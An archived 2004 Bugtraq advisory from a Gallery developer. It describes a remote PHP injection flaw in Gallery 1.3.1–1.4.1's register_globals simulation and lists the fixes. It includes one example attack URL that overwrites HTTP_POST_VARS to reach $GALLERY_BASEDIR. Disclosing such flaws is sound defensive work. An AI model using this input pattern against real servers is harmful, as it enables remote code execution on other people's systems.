lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <0c0a01c3e525$1c0ed2b0$c90c030a@bmedirattatg>
Date: Tue, 27 Jan 2004 14:29:52 -0800
From: "Bharat Mediratta" <bharat@...alto.com>
To: <bugtraq@...urityfocus.com>
Subject: Remote exploit in Gallery 1.3.1, 1.3.2, 1.3.3, 1.4 and 1.4.1


(Big thanks to Fred [vrotogel] for discovering this vulnerability
 and alerting us before posting )

___________________
PROBLEM DESCRIPTION

Gallery is an open source image management system written in PHP.
Learn more about it at http://gallery.sourceforge.net

Starting in release 1.3.1, Gallery includes code to simulate the
behaviour of register_globals in environments where that setting
is disabled.  We do this by extracting the values of the various
$HTTP_ global variables into the global namespace.  We check
for the presence of certain types of malicious data before doing
this, but our checks are inadequate.

A clever hacker can circumvent our checks by crafting a URL like
this:

    http://example.com/gallery/init.php?HTTP_POST_VARS=xxx

this causes our register_global simulation code to overwrite
the HTTP_POST_VARS which, when it in turn is extracted will
deliver the payload.  If the payload compromises $GALLERY_BASEDIR
then the malicious user can perform a PHP injection exploit and
gain remote access to your box as the webserver/PHP user id.

_________________
VERSIONS AFFECTED

This vulnerability affects Gallery releases 1.3.1, 1.3.2, 1.3.3,
1.4 and 1.4.1.  It has been fixed in Gallery v1.4.1-pl1, v1.4.2
(not yet released) and in the CVS HEAD.  We strongly recommend
that all users upgrade to Gallery v1.4.1-pl1 ASAP.

__________________
FIXING THE PROBLEM

There are three different ways you can resolve this problem.

1.  Replace init.php and setup/init.php with the files from this zip:

http://prdownloads.sourceforge.net/gallery/patch_1.4.1-to-1.4.1-pl1.zip?download

     -or-

2.  Upgrade to Gallery 1.4.1-pl1:

http://sourceforge.net/project/showfiles.php?group_id=7130&package_id=7239&release_id=212324


    -or-

3.  Follow the instructions in this news article:
      http://gallery.sourceforge.net/article.php?sid=107
    to manually patch the two affected files.  (won't take more
    than a couple of minutes).


regards,
Bharat Mediratta
Gallery developer

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ